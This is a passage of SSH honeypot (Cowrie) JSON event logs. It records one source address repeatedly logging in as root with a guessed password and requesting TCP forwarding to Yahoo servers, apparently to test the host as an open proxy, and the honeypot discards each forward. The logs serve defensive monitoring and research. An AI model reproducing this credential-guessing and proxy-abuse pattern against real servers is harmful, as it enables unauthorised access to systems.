","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.155035Z","src_ip":"213.209.150.239","session":"df8421e5702b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.437809Z","src_ip":"213.209.150.239","session":"df8421e5702b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16082,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16082","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.496380Z","session":"df8421e5702b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.553162Z","src_ip":"213.209.150.239","session":"df8421e5702b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":3865,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3865","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.707058Z","session":"df8421e5702b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.763767Z","src_ip":"213.209.150.239","session":"df8421e5702b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.821271Z","src_ip":"213.209.150.239","session":"df8421e5702b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19565,"dst_ip":"1.2.3.4","dst_port":22,"session":"38b596c59b46","protocol":"ssh","message":"New connection: 213.209.150.239:19565 (1.2.3.4:22) [session: 38b596c59b46]","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.867213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.877317Z","src_ip":"213.209.150.239","session":"38b596c59b46"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:42.914346Z","src_ip":"213.209.150.239","session":"38b596c59b46"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.148641Z","src_ip":"213.209.150.239","session":"38b596c59b46"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10542,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10542","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.196525Z","session":"38b596c59b46"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.243861Z","src_ip":"213.209.150.239","session":"38b596c59b46"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":13489,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13489","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.389303Z","session":"38b596c59b46"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.436367Z","src_ip":"213.209.150.239","session":"38b596c59b46"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.484148Z","src_ip":"213.209.150.239","session":"38b596c59b46"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19606,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f12303d2670","protocol":"ssh","message":"New connection: 213.209.150.239:19606 (1.2.3.4:22) [session: 4f12303d2670]","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.531453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.532190Z","src_ip":"213.209.150.239","session":"4f12303d2670"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.579100Z","src_ip":"213.209.150.239","session":"4f12303d2670"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.814337Z","src_ip":"213.209.150.239","session":"4f12303d2670"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17329,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17329","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.862639Z","session":"4f12303d2670"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:43.909962Z","src_ip":"213.209.150.239","session":"4f12303d2670"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":12753,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12753","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.045512Z","session":"4f12303d2670"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.092776Z","src_ip":"213.209.150.239","session":"4f12303d2670"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.141366Z","src_ip":"213.209.150.239","session":"4f12303d2670"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19660,"dst_ip":"1.2.3.4","dst_port":22,"session":"f01ddf272e51","protocol":"ssh","message":"New connection: 213.209.150.239:19660 (1.2.3.4:22) [session: f01ddf272e51]","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.187669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.188372Z","src_ip":"213.209.150.239","session":"f01ddf272e51"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.236270Z","src_ip":"213.209.150.239","session":"f01ddf272e51"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.470848Z","src_ip":"213.209.150.239","session":"f01ddf272e51"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22905,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22905","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.519160Z","session":"f01ddf272e51"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.566810Z","src_ip":"213.209.150.239","session":"f01ddf272e51"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":14241,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:14241","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.705667Z","session":"f01ddf272e51"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.752857Z","src_ip":"213.209.150.239","session":"f01ddf272e51"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.800902Z","src_ip":"213.209.150.239","session":"f01ddf272e51"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19707,"dst_ip":"1.2.3.4","dst_port":22,"session":"9af66cd2f19e","protocol":"ssh","message":"New connection: 213.209.150.239:19707 (1.2.3.4:22) [session: 9af66cd2f19e]","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.856543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.857526Z","src_ip":"213.209.150.239","session":"9af66cd2f19e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:44.914041Z","src_ip":"213.209.150.239","session":"9af66cd2f19e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.196703Z","src_ip":"213.209.150.239","session":"9af66cd2f19e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6913,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6913","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.254558Z","session":"9af66cd2f19e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.311445Z","src_ip":"213.209.150.239","session":"9af66cd2f19e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":8616,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:8616","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.467036Z","session":"9af66cd2f19e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.523804Z","src_ip":"213.209.150.239","session":"9af66cd2f19e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.581188Z","src_ip":"213.209.150.239","session":"9af66cd2f19e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19825,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bf74061f2bc","protocol":"ssh","message":"New connection: 213.209.150.239:19825 (1.2.3.4:22) [session: 6bf74061f2bc]","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.636808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.637785Z","src_ip":"213.209.150.239","session":"6bf74061f2bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.694508Z","src_ip":"213.209.150.239","session":"6bf74061f2bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:45.977660Z","src_ip":"213.209.150.239","session":"6bf74061f2bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8253,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8253","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.035618Z","session":"6bf74061f2bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.092281Z","src_ip":"213.209.150.239","session":"6bf74061f2bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10375,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10375","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.247023Z","session":"6bf74061f2bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.303734Z","src_ip":"213.209.150.239","session":"6bf74061f2bc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.361313Z","src_ip":"213.209.150.239","session":"6bf74061f2bc"}
